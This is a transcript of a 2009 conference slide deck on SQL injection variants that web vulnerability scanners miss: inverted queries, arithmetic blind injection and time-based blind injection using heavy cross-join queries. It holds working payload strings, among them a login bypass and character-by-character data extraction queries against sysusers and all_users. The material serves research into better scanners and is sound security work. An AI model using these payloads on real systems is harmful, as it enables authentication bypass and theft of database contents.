How "·$% developers defeat the web vulnerability scanners

How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica

Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavey Queries
5.- Conclusions

1.-Introduction

SQL Injection is still here among us

Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs

Need to Improve Automatic Scanning
Not always a manual scanning is possible
Time
Confidentiality
Money, money, money…
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools.

2.-Inverted Queries

Homers, how are they?
Lazy
Bad trainined
Poor Experience in security stuff
Don´t like working
Don´t like computing
Don´t like coding
Don´t like you!

Flanders are Left-handed

Right
SELECT UID
FROM USERS
WHERE NAME=‘V_NAME’
AND
PASSWORD=‘V_PASSW’;

Wrong?
SELECT UID
FROM USERS
WHERE ‘V_NAME’=NAME AND
‘ V_PASSW’=PASSWORD

Login Inverted Query
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1
Select uid
From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password
 FAIL

Login Inverted SQL Injection an example
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica
Select uid
From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password
 Success

Blind Attacks
Attacker injects code but can´t access directly to the data.
However this injection changes the behavior of the web application.
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
Blind SQL Injection
Biind Xpath Injection
Blind LDAP Injection

Blind SQL Injection Attacks
Attacker injects:
“ True where clauses”
“ False where clauses“
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
Program doesn’t return any visible data from database or data in error messages.
The attacker can´t see any data extracted from the database.

Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:
Different hashes
Different html structure
Different patterns (keywords)
Different linear ASCII sums
“ Different behavior”
By example: Response Time

If any difference exists, then:
Attacker can extract all information from database
How? Using “booleanization”
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
“ True-Answer Page” or “False-Answer Page”?
MSSQL:
Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)
Oracle:
Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)

Blind Inverted Query
Select product
From products
Where v_value=id;
http://www.web.com/products.php?v_value= 2 and 1=1
Select product
From products
Where 2 and 1=1=id;
-> FAIL

The MySQL Case
1 is True
1=1=1 ->True
1=1=(1+1-1)=abs(1)=1 -> True
2=2=2 ->False
-> 2=2 becomes True -> True=2
-> True is equals to 1 then 1=2 is False
Select product
From products
Where v_value=id;
http://www.web.com/products.php?v_value= 1 and 1=1
Select product
From products
Where 1 and 1=1=id;
-> SUCCES (if there is a Id=1)

Web Scanner behaviors
Acunetix
Paros
AppScan
W3af
Wapiti
Proxy Strike

Acunetix & Homer

Acunetix & Flanders

AppScan & Homer

AppScan & Flanders

Paros & Homer

Paros & Flanders

W3af & Homer

W3af & Flanders

Wapiti & Homer

Wapiti & Flanders

Demo
W3af
Wapiti
Proxy Strike

Results Normal Inverted MySQL MS SQL Server MySQL MS SQL Server Numeric String Numeric String Numeric String Numeric String Paros AppScan Acunetix w3af wapiti Proxy Strike

In the end…
OUCH!!!
Thank God for keep me safe

Solutions?
Concat string injection
Arithmetic Blind SQL Injection
Time-Based Blind SQL injection
Delay Functions
Heavy queries

3.- Arithmetic

What about this queries?
How to detect/exploit this Blind SQLinjection vulnerability?
The query forces the parameter to be numeric
SELECT field FROM table WHERE id=abs( param )
Ex:
Get Param( ID )
Select ….. Where att1=abs( ID )
Select ….. Where att2=k1- ID
Print response
Not AND or OR operators can be used.
Boolean logic needs to be created with math operations

Divide by zero (David Litchfield)
Id=A+(1/(ASCII(B)-C))
A-> Param value originally used in the query.
B -> Value we are searching for, e.g.: Substring(passwd,1,1)
C-> Counter [0..255]
TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception.

Sums and subtractions
Id=A+ASCII(B)-C
When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A

Value type overflow
Id=A+((C/ASCII(B))*(K))
K-> Value that overflows the type defined for A
(e.g. if A is integer, then K=2^ 32 )
When C/ASCII(B)==1, K*1 overflows the data type

Demo:
Divide by zero
Sums and subtractions
Integer overflow

Conclusions
Arithmetic Blind SQL Injection allows to construct binary logic without “AND” and “OR”.
detects bugs in this kind of queries…
And also in Inverted queries in which a numeric value is used
Almost none of the vulnerability scanners are using this method

4.-Time-based Blind SQL Injection using heavy queries

Time-Based Blind SQL Injection
In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used.
Injection forces a delay in the response page when the condition injected is True.
- Delay functions:
SQL Server: waitfor
Oracle: dbms_lock.sleep
MySQL: sleep or Benchmark Function
Postgres: pg_sleep
Ex:
; if (exists(select * from users)) waitfor delay '0:0:5’

Time-Based Blind SQL Injection
What about DBs without delay functions, i.e.:
Oracle connections MS Access DB2
without PL/SQL injection
Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?

“ Where-Clause” execution order
Select “whatever “
From whatever
Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?

The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec

The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec

Time-Based Blind SQL Injection using Heavy Queries
Attacker can perform an exploitation delaying the “True-answer page” using a heavy query.
It depends on how the database engine evaluates the where clauses in the query.
There are two types of database engines:
Databases without optimization process
Databases with optimization process

Time-Based Blind SQL Injection using Heavy Queries
Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections.
The Cross-join injection must be heavier than the other condition.
Attacker only have to know or to guess the name of a table with select permission in the database.
Example in MSSQL:
Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

“ Default” tables to construct a heavy query
Microsoft SQL Server
sysusers
Oracle
all_users
MySQL (versión 5)
information_schema.columns
Microsoft Access
MSysAccessObjects (97 & 2000 versions)
MSysAccessStorage (2003 & 2007)

“ Default” tables to construct a heavy query
… or whatever you can guess
Clients
Customers
News
Logins
Users
Providers
… .Use your imagination…

Ex 1: MS SQL Server
Query takes 14 seconds -> True-Answer

Ex 1: MS SQL Server
Query takes 1 second -> False-Answer

Ex 2: Oracle
Query Takes 22 seconds –> True-Answer

Ex 2: Oracle
Query Takes 1 second –> False-Answer

Ex 3: Access 2007
Query Takes 39 seconds –> True-Answer

Ex 3: Access 2007
Query Takes 1 second –> False-Answer

Marathon Tool
Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.
Schema Extraction from known databases
Extract data using heavy queries not matter in which database engine (without schema)
Developed in .NET
Source code available
http://www.codeplex.com/marathontool

Demo: Marathon Tool

5.- Conclusions

The real world has plenty kinds of developers…

References
Inverted SQL queries (Spanish)
http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html
Arithemtic Blind SQL Injection (spanish)
http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html
Time-Based Blind SQL Injection Using heavy queries & Marathon Tool
http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
Marathon Tool
http://www.codeplex.com/marathontool
Connection String Attacks (spanish)
http://www.slideshare.net/chemai64/connection-string-parameter-pollution

Don´t complain about your job!!

Thanks! Chema Alonso ( [email_address] ) José Parada ( [email_address] )

http://www.elladodelmal.com	674
http://elladodelmal.blogspot.com	170
http://www.slideshare.net	6
http://twitter.com	4
https://twitter.com	4
resource://brief-content	1

How "·$% developers defeat the web vulnerability scanners

by Chema Alonso on Nov 20, 2009

Accessibility

Categories

Tags

Upload Details

Usage Rights

6 Embeds 859

Statistics

How "·$% developers defeat the web vulnerability scanners — Presentation Transcript